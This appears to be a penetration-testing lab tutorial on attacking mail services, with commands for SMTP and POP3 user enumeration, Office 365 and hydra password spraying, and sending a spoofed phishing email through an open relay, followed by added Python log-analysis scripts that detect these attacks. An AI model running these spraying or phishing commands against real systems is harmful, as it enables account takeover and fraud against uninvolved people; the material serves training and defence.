Email Services
Email servers are complex and usually require us to enumerate multiple servers, ports, and services. Furthermore, today most companies have their email services in the cloud with services such as Microsoft 365 or G-Suite. Therefore, our approach to attacking the email service depends on the service in use.
We can use the Mail eXchanger (MX) DNS record to identify a mail server. We can use tools such as host or dig, and online websites such as MXToolbox, to query information about the MX records:
host -t MX hackthebox.eu
dig mx plaintext.do | grep "MX" | grep -v ";"
host -t A mail1.inlanefreight.htb.
If we are targeting a custom mail server implementation such as inlanefreight.htb, we can enumerate the following ports:
| Port | Service |
| --- | --- |
| TCP/25 | SMTP Unencrypted |
| TCP/143 | IMAP4 Unencrypted |
| TCP/110 | POP3 Unencrypted |
| TCP/465 | SMTP Encrypted |
| TCP/587 | SMTP Encrypted/STARTTLS |
| TCP/993 | IMAP4 Encrypted |
| TCP/995 | POP3 Encrypted |
We can use Nmap's default script option (-sC) to enumerate those ports on the target system:
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 <IP>
Misconfigurations
Authentication
The SMTP server has different commands that can be used to enumerate valid usernames: VRFY, EXPN, and RCPT TO. If we successfully enumerate valid usernames, we can attempt to password spray, brute-force, or guess a valid password. Let's explore how those commands work.
VRFY: this command instructs the receiving SMTP server to check the validity of a particular email username. The server's reply indicates whether or not the user exists. This feature can be disabled.
telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
VRFY root
252 2.0.0 root
VRFY www-data
252 2.0.0 www-data
VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
EXPN is similar to VRFY, except that when used with a distribution list, it will list all users on that list. This can be a bigger problem than the VRFY command since sites often have an alias such as "all".
telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
EXPN john
250 2.1.0 [email protected]
EXPN support-team
250 2.0.0 [email protected]
250 2.1.5 [email protected]
RCPT TO identifies the recipient of the email message. This command can be repeated multiple times for a given message to deliver a single message to multiple recipients.
telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
MAIL FROM:[email protected]
it is
250 2.1.0 [email protected]... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
We can also use the POP3 protocol to enumerate users, depending on the service implementation. For example, we can send the command USER followed by the username; if the server responds with +OK, the user exists on the server.
telnet 10.10.110.20 110
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready
USER julio
-ERR
USER john
+OK
Automatic enumeration
To automate our enumeration process, we can use a tool named smtp-user-enum. We can specify the enumeration mode with the argument -M followed by VRFY, EXPN, or RCPT, and the argument -U with a file containing the list of users we want to enumerate. Depending on the server implementation and enumeration mode, we need to add the domain for the email address with the argument -D. Finally, we specify the target with the argument -t.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t <IP>
Cloud Enumeration
O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365).
Validate that the domain uses the service:
python3 o365spray.py --validate --domain msplaintext.xyz
Attempt to identify usernames:
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
Password Attacks
We can use Hydra to perform a password spray or brute force against email services such as SMTP, POP3, or IMAP4. First, we need a username list and a password list, and we need to specify which service we want to attack. Let us see an example for POP3.
hydra -L users.txt -p 'Company01!' -f <IP> pop3
For cloud services, we can try custom tools such as o365spray or MailSniper for Microsoft Office 365, or CredKing for Gmail or Okta.
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain <domain>
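A defender's view of the same activity, as an added example that is not part of the original page: the script below reads Dovecot pop3-login/imap-login failures and classifies each client as a password spray (one password across many users, the hydra -L users.txt -p pattern above) or a brute force (many attempts against one user), and notes when a spraying client then logs in successfully. The log lines are constructed and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed Dovecot pop3-login/imap-login lines (not from the page). One client tries
# one password against many users and finally gets a login; a second client hammers a
# single account instead; a third only logs in normally.
SAMPLE_LOG = """\
Mar 10 11:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<julio>, method=PLAIN, rip=10.10.110.5, lip=10.10.110.20, session=<a1>
Mar 10 11:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<kate>, method=PLAIN, rip=10.10.110.5, lip=10.10.110.20, session=<a2>
Mar 10 11:00:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<admin>, method=PLAIN, rip=10.10.110.5, lip=10.10.110.20, session=<a3>
Mar 10 11:00:04 mail dovecot: pop3-login: Login: user=<john>, method=PLAIN, rip=10.10.110.5, lip=10.10.110.20, mpid=3321, session=<a4>
Mar 10 11:02:10 mail dovecot: imap-login: Disconnected (auth failed, 3 attempts in 9 secs): user=<john>, method=PLAIN, rip=198.51.100.7, lip=10.10.110.20, session=<b1>
Mar 10 11:02:20 mail dovecot: imap-login: Disconnected (auth failed, 3 attempts in 8 secs): user=<john>, method=PLAIN, rip=198.51.100.7, lip=10.10.110.20, session=<b2>
Mar 10 11:05:00 mail dovecot: imap-login: Login: user=<alice>, method=PLAIN, rip=203.0.113.9, lip=10.10.110.20, mpid=3350, session=<c1>
"""

# Failed logins carry the attempt count; rip= is the remote (client) address.
FAIL_RE = re.compile(r"(?:pop3|imap)-login: Disconnected \(auth failed, (?P<n>\d+) attempts[^)]*\): "
                     r"user=<(?P<user>[^>]*)>, .*rip=(?P<ip>[^,]+)")
OK_RE = re.compile(r"(?:pop3|imap)-login: Login: user=<(?P<user>[^>]*)>, .*rip=(?P<ip>[^,]+)")

def classify(log_text, spray_users=3, brute_attempts=5):
    """Return {client_ip: verdict}. 'password spray' = failures spread over >= spray_users
    distinct accounts; 'brute force' = >= brute_attempts failures on one account; a login
    from a spraying client upgrades its verdict. Thresholds are assumed, tune per site."""
    fails = defaultdict(lambda: defaultdict(int))   # ip -> user -> failed attempts
    logins = defaultdict(set)                        # ip -> users that logged in
    for line in log_text.splitlines():
        if m := FAIL_RE.search(line):
            fails[m["ip"]][m["user"]] += int(m["n"])
        elif m := OK_RE.search(line):
            logins[m["ip"]].add(m["user"])
    verdicts = {}
    for ip, per_user in fails.items():
        if len(per_user) >= spray_users:
            verdicts[ip] = "password spray"
            if logins[ip]:
                verdicts[ip] += f", then success as {sorted(logins[ip])}"
        elif max(per_user.values()) >= brute_attempts:
            verdicts[ip] = f"brute force against {max(per_user, key=per_user.get)}"
    return verdicts
```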
Protocol Specific Attacks
Open Relay
An open relay is a Simple Mail Transfer Protocol (SMTP) server that is improperly configured and allows unauthenticated email relaying.
From an attacker's standpoint, we can abuse this for phishing by sending emails as non-existing users or spoofing someone else's email.
With the Nmap smtp-open-relay script, we can identify if an SMTP port allows an open relay.
nmap -p25 -Pn --script smtp-open-relay <IP>
Next, we can use any mail client to connect to the mail server and send our email.
swaks --from [email protected] --to [email protected] --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server <IP>
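Added example, not from the page: on the defending side, both the VRFY/EXPN/RCPT TO enumeration shown under Authentication and attempts to relay through the server leave rejection lines in the Postfix smtpd log. The script below groups those rejections per client IP and flags user enumeration and relay probes; the log lines are constructed and the threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed Postfix smtpd lines (not from the page): three 5.1.1 rejections from one
# client are the trace VRFY/RCPT TO enumeration leaves, one from a partner MX is a
# plain typo, and the 5.7.1 lines are what a non-open relay logs when relaying is tried.
SAMPLE_LOG = """\
Mar 10 10:01:02 mail postfix/smtpd[2133]: NOQUEUE: reject: VRFY from unknown[10.10.110.5]: 550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table; to=<new-user> proto=SMTP helo=<parrot>
Mar 10 10:01:03 mail postfix/smtpd[2133]: NOQUEUE: reject: RCPT from unknown[10.10.110.5]: 550 5.1.1 <julio@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@inlanefreight.htb> to=<julio@inlanefreight.htb> proto=ESMTP helo=<parrot>
Mar 10 10:01:03 mail postfix/smtpd[2133]: NOQUEUE: reject: RCPT from unknown[10.10.110.5]: 550 5.1.1 <kate@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@inlanefreight.htb> to=<kate@inlanefreight.htb> proto=ESMTP helo=<parrot>
Mar 10 10:05:30 mail postfix/smtpd[2140]: NOQUEUE: reject: RCPT from mx.partner.example[203.0.113.9]: 550 5.1.1 <typo@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<alice@partner.example> to=<typo@inlanefreight.htb> proto=ESMTP helo=<mx.partner.example>
Mar 10 10:09:12 mail postfix/smtpd[2150]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 554 5.7.1 <victim@external.example>: Relay access denied; from=<notifications@inlanefreight.htb> to=<victim@external.example> proto=ESMTP helo=<[198.51.100.7]>
Mar 10 10:09:13 mail postfix/smtpd[2150]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 554 5.7.1 <victim2@external.example>: Relay access denied; from=<notifications@inlanefreight.htb> to=<victim2@external.example> proto=ESMTP helo=<[198.51.100.7]>
"""

# One pattern for both kinds: SMTP command, client IP, enhanced status code, address, reason.
REJECT_RE = re.compile(
    r"reject: (?P<cmd>RCPT|VRFY|EXPN) from \S+\[(?P<ip>[^\]]+)\]: "
    r"\d{3} (?P<status>5\.\d\.\d) <(?P<addr>[^>]+)>: (?P<reason>[^;]+)"
)

def parse_rejects(log_text):
    """One dict per rejection line the pattern recognises; other lines are ignored."""
    out = []
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            out.append(m.groupdict())
    return out

def triage(log_text, enum_threshold=3):
    """Group rejections by client IP. >= enum_threshold distinct unknown recipients (5.1.1)
    from one client is flagged as user enumeration (a real sender's typo is one address);
    any 5.7.1 'Relay access denied' is a relay probe that an open relay would have accepted."""
    unknown, relay = defaultdict(set), defaultdict(int)
    for r in parse_rejects(log_text):
        if r["status"] == "5.1.1" and "User unknown" in r["reason"]:
            unknown[r["ip"]].add(r["addr"])
        elif r["status"] == "5.7.1" and "Relay access denied" in r["reason"]:
            relay[r["ip"]] += 1
    findings = defaultdict(list)
    for ip, addrs in unknown.items():
        if len(addrs) >= enum_threshold:
            findings[ip].append(f"user enumeration: {len(addrs)} unknown recipients")
    for ip, n in relay.items():
        findings[ip].append(f"relay probe: {n} relay attempts denied")
    return dict(findings)
```

On a Postfix server, the VRFY half of this noise disappears once disable_vrfy_command = yes is set; the RCPT TO half cannot be disabled, so it is worth alerting on.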